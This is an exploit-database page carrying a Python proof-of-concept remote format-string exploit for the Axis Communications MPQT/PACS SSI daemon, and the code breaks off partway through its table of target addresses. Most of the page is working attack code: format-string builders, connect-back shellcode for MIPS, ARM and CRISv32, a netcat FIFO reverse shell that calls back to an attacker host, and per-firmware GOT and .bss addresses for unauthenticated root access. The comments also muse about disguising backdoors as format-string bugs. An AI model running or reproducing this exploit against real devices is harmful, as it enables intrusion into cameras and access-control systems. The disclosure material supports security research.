0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String
[#!/usr/bin/env python2.7
#
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
# - "One-Write-Where-And-What" for MIPS and CRISv32
# Using "Old Style" POP's
# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
# - "Two-Write-Where-And-What" for ARM
# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1. Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect.
# Old metod with POP's coming into force instantly
#
# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)
# - Would be interesting to investigate why.
#
# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4. Everything is randomized, except heap.
#
# 5. My initial attempts to use ROP's was not good, as I didn't want to create
# one unique FMS key by testing each single firmware version, and using ROP with FMS
# on heap seems pretty complicated as there is one jump availible, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#
# 6. Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
# so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
# and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8. This exploit are pretty well documented, more details can be extracted by reading
# the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]
#
# ARM ssid maps
# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]
#
# General notes:
#
# When the vul daemon process is exploited, and after popping root connect-back shell,
# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
# when the main process are fully alive again, I can enjoy the shell, and everybody else can
# enjoy of the camera - that should make all of us happy ;)
# During exploiting, logs says almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
# after ssid cannot verify the user, free() are the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.
#
# - No hardcoded login/password that could easily be found in firmware/software files.
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)
# 5.00.x 2008 - - no
# 5.01.x 2008 no - no
# 5.02.x 2008 no - -
# 5.05.x 2009 no - -
# 5.06.x 2009 no - -
# 5.07.x 2009 no - no
# 5.08.x 2010 no - -
# 5.09.x 2010 no - -
# 5.10.x 2009 no - -
# 5.11.x 2010 no - -
# 5.12.x 2010 no - -
# 5.15.x 2010 no - -
# 5.16.x 2010 no - -
# 5.20.x 2010-2011 5.2x - 5.2x
# 5.21.x 2011 5.2x - 5.2x
# 5.22.x 2011 5.2x - -
# 5.25.x 2011 5.2x - -
# 5.40.x 2011 5.4x 5.4x 5.4x
# 5.41.x 2012 5.4x - -
# 5.50.x 2013 5.5x 5.5x 5.4x
# 5.51.x 2013 - 5.4x -
# 5.55.x 2013 - 5.5x 5.5x
# 5.60.x 2014 - 5.6x 5.6x
# 5.65.x 2014-2015 - 5.6x -
# 5.70.x 2015 - 5.7x -
# 5.75.x 2015 - 5.7x 5.7x
# 5.80.x 2015 - 5.8x 5.8x
# 5.81.x 2015 - 5.8x -
# 5.85.x 2015 - 5.8x 5.8x
# 5.90.x 2015 - 5.9x -
# 5.95.x 2016 - 5.9x 5.8x
# 6.10.x 2016 - 6.1x -
# 6.15.x 2016 - - 6.1x
# 6.20.x 2016 - 6.2x -
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# product-security@axis.com
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor responce received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that exploit do not work after vendors correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################
import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re
class do_FMS:
# POP = "%8x" # Old style POP's with 8 bytes per POP
POP = "%1c" # Old style POP's with 1 byte per POP
WRITElln = "%lln" # Write 8 bytes
WRITEn = "%n" # Write 4 bytes
WRITEhn = "%hn" # Write 2 bytes
WRITEhhn = "%hhn" # Write 1 byte
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
self.fmscode = ""
# Mostly used internally in this function
def Add(self, data):
self.fmscode += data
# 'New Style' Double word (8 bytes)
def AddDirectParameterLLN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$lln')
# 'New Style' Word (4 bytes)
def AddDirectParameterN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$n')
# 'New Style' Half word (2 bytes)
def AddDirectParameterHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hn')
# 'New Style' One Byte (1 byte)
def AddDirectParameterHHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hhn')
# Addressing
def AddADDR(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('u')
# 'Old Style' POP
def AddPOP(self, size):
if size != 0:
self.Add(self.POP * size)
# Normally only one will be sent, multiple is good to quick-check for any FMS
#
# 'Old Style' Double word (8 bytes)
def AddWRITElln(self, size):
self.Add(self.WRITElln * size)
# 'Old Style' Word (4 bytes)
def AddWRITEn(self, size):
self.Add(self.WRITEn * size)
# 'Old Style' Half word (2 bytes)
def AddWRITEhn(self, size):
self.Add(self.WRITEhn * size)
# 'Old Style' One byte (1 byte)
def AddWRITEhhn(self, size):
self.Add(self.WRITEhhn * size)
# Return the whole FMS string
def FMSbuild(self):
return self.fmscode
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.noexploit = noexploit
# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc..
def RAW(self, uri):
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp = self.host.split(':')
HOST = tmp[0]
PORT = int(tmp[1])
if self.verbose:
print "[Verbose] Sending to:", HOST
print "[Verbose] Port:", PORT
print "[Verbose] URI:",uri
s.connect((HOST, PORT))
s.send("GET %s HTTP/1.0\r\n\r\n" % uri)
html = (s.recv(4096)) # We really do not care whats coming back
# if html:
# print "[i] Received:",html
s.shutdown(3)
s.close()
return html
def Send(self, uri):
# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually
# matter for the functionality of this exploit, only for future references.
headers = {
'User-Agent' : 'MSIE',
}
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '%s://%s%s' % (self.proto, self.host, uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Default Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
else:
data = None
req = urllib2.Request(url, data, headers)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] %s OK" % rsp.code
html = rsp.read()
return html
class shellcode_db:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def sc(self,target):
self.target = target
# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode availible out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
# Slightly modified syscall's
MIPSel = string.join([
#close stdin
"%ff%ff%04%28" #slti a0,zero,-1
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stdout
"%11%11%04%28" #slti a0,zero,4369
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stderr
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
# socket AF_INET (2)
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%27%28%80%01" #nor a1,t4,zero
"%ff%ff%06%28" #slti a2,zero,-1
"%57%10%02%24" #li v0,4183
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
#
# dup2 stdout
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# dup2 stderr
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# Port
"PP1PP0%05%3c"
"%01%ff%a5%34"
#
"%01%01%a5%20" #addi a1,a1,257
"%f8%ff%a5%af" #sw a1,-8(sp)
#
# IP
"IP3IP4%05%3c"
"IP1IP2%a5%34"
#
"%fc%ff%a5%af" #sw a1,-4(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ef%ff%0c%24" #li t4,-17
"%27%30%80%01" #nor a2,t4,zero
"%4a%10%02%24" #li v0,4170
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%62%69%08%3c" #lui t0,0x6962
"%2f%2f%08%35" #ori t0,t0,0x2f2f
"%ec%ff%a8%af" #sw t0,-20(sp)
"%73%68%08%3c" #lui t0,0x6873
"%6e%2f%08%35" #ori t0,t0,0x2f6e
"%f0%ff%a8%af" #sw t0,-16(sp
"%ff%ff%07%28" #slti a3,zero,-1
"%f4%ff%a7%af" #sw a3,-12(sp)
"%fc%ff%a7%af" #sw a3,-4(sp
"%ec%ff%a4%23" #addi a0,sp,-20
"%ec%ff%a8%23" #addi t0,sp,-20
"%f8%ff%a8%af" #sw t0,-8(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ec%ff%bd%27" #addiu sp,sp,-20
"%ff%ff%06%28" #slti a2,zero,-1
"%ab%0f%02%24" #li v0,4011 (execve)
"%4c%f7%f7%03" #syscall 0xdfdfd
], '')
# Working netcat shell
# - $PATH will locate 'mkfifo', 'nc' and 'rm'
# - LHOST / LPORT will be changed on the fly later in the code
# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
# $ echo -n "$IFS" | hexdump -C
# 00000000 20 09 0a
# - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
#
# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
#
# Working with Apache and Boa
# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"
ARMel = string.join([
# original: http://shell-storm.org/shellcode/files/shellcode-754.php
# 32-bit instructions, enter thumb mode
"%01%10%8f%e2" # add r1, pc, #1
"%11%ff%2f%e1" # bx r1
# 16-bit thumb instructions follow
#
# socket(2, 1, 0)
"%02%20" #mov r0, #2
"%01%21" #mov r1, #1
"%92%1a" #sub r2, r2, r2
"%0f%02" #lsl r7, r1, #8
"%19%37" #add r7, r7, #25
"%01%df" #svc 1
#
# connect(r0, &addr, 16)
"%06%1c" #mov r6, r0
"%08%a1" #add r1, pc, #32
"%10%22" #mov r2, #16
"%02%37" #add r7, #2
"%01%df" #svc 1
#
# dup2(r0, 0/1/2)
"%3f%27" #mov r7, #63
"%02%21" #mov r1, #2
#
#lb:
"%30%1c" #mov r0, r6
"%01%df" #svc 1
"%01%39" #sub r1, #1
"%fb%d5" #bpl lb
#
# execve("/bin/sh", ["/bin/sh", 0], 0)
"%05%a0" #add r0, pc, #20
"%92%1a" #sub r2, r2, r2
"%05%b4" #push {r0, r2}
"%69%46" #mov r1, sp
"%0b%27" #mov r7, #11
"%01%df" #svc 1
#
"%c0%46" # .align 2 (NOP)
"%02%00" # .short 0x2 (struct sockaddr)
"PP1PP0" # .short 0x3412 (port: 0x1234)
"IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1)
# .ascii "/bin/sh\0\0"
"%2f%62%69%6e" # /bin
"%2f%73%68%00%00" # /sh\x00\x00
"%00%00%00%00"
"%c0%46"
], '')
# Connect-back shell for Axis CRISv32
# Written by mcw noemail eu 2016
#
CRISv32 = string.join([
#close(0)
"%7a%86" # clear.d r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(1)
"%41%a2" # moveq 1,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(2)
"%42%a2" # moveq 2,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#
"%10%e1" # addoq 16,sp,acr
"%42%92" # moveq 2,r9
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%02%f2" # addq 2,acr
#PORT
"%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 #
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%6f%96" # move.d acr,r9
"%04%92" # addq 4,r9
#IP
"%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr
"%e9%fb" # move.d acr,[r9]
#
#socket()
"%42%a2" # moveq 2,r10
"%41%b2" # moveq 1,r11
"%7c%86" # clear.d r12
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%41%a2" # moveq 1,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
#
"%6a%96" # move.d $r10,$r9
"%0c%e1" # addoq 12,$sp,$acr
"%ef%9b" # move.d $r9,[$acr]
"%0c%e1" # addoq 12,$sp,$acr
"%6e%96" # move.d $sp,$r9
"%10%92" # addq 16,$r9
"%6f%aa" # move.d [$acr],$r10
"%69%b6" # move.d $r9,$r11
"%50%c2" # moveq 16,$r12
#
# connect()
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%43%a2" # moveq 3,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
# dup(0) already in socket
#dup(1)
"%6f%aa" # move.d [$acr],$r10
"%41%b2" # moveq 1,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#dup(2)
"%6f%aa" # move.d [$acr],$r10
"%42%b2" # moveq 2,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#execve("/bin/sh",NULL,NULL)
"%90%e2" # subq 16,$sp
"%6e%96" # move.d $sp,$r9
"%6e%a6" # move.d $sp,$10
"%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%e9%ab" # move.d $r10,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%10%e2" # addq 16,$sp
"%6e%f6" # move.d $sp,$acr
"%6e%96" # move.d $sp,$r9
"%6e%b6" # move.d $sp,$r11
"%7c%86" # clear.d $r12
"%4b%92" # moveq 11,$r9
"%3d%e9" # break 13
], '')
if self.target == 'MIPSel':
return MIPSel
elif self.target == 'ARMel':
return ARMel
elif self.target == 'CRISv32':
return CRISv32
elif self.target == 'NCSH1':
return NCSH
elif self.target == 'NCSH2':
return NCSH
else:
print "[!] Unknown shellcode! (%s)" % str(self.target)
sys.exit(1)
class FMSdb:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def FMSkey(self,target):
self.target = target
target_db = {
#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'MIPS-5.85.x': [
0x41f370, # Adjust to GOT free() address
0x420900, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.40.3': [
0x41e41c, # Adjust to GOT free() address
0x4208cc, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.4x': [
0x41e4cc, # Adjust to GOT free() address
0x42097c, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.5x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.55x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
11, # 1st POP's
9, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.6x': [
0x41d048, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.7x': [
0x41d04c, # Adjust to GOT free() address
0x41f718, # .bss shellcode address
2, # 1st POP's
14, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.75x': [
0x41c498, # Adjust to GOT free() address
0x41daf0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.8x': [
0x41d0c0, # Adjust to GOT free() address
0x41e740, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.9x': [
0x41d0c0, # Adjust to GOT free() address
0x41e750, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.1x': [
0x41c480, # Adjust to GOT free() address
0x41dac0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.2x': [
0x41e578, # Adjust to GOT free() address
0x41fae0, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.20x': [
0x41d0c4, # Adjust to GOT free() address
0x41e700, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.3x': [
0x41e4cc, # Adjust to GOT free() address
0x420a78, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.1x': [
0x41e268, # Adjust to GOT free() address
0x420818, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.
#
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.50x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1e7c8, # .bss shellcode address
93, # 1st POP's
1, # 2nd POP's
'axis', # Aligns injected code
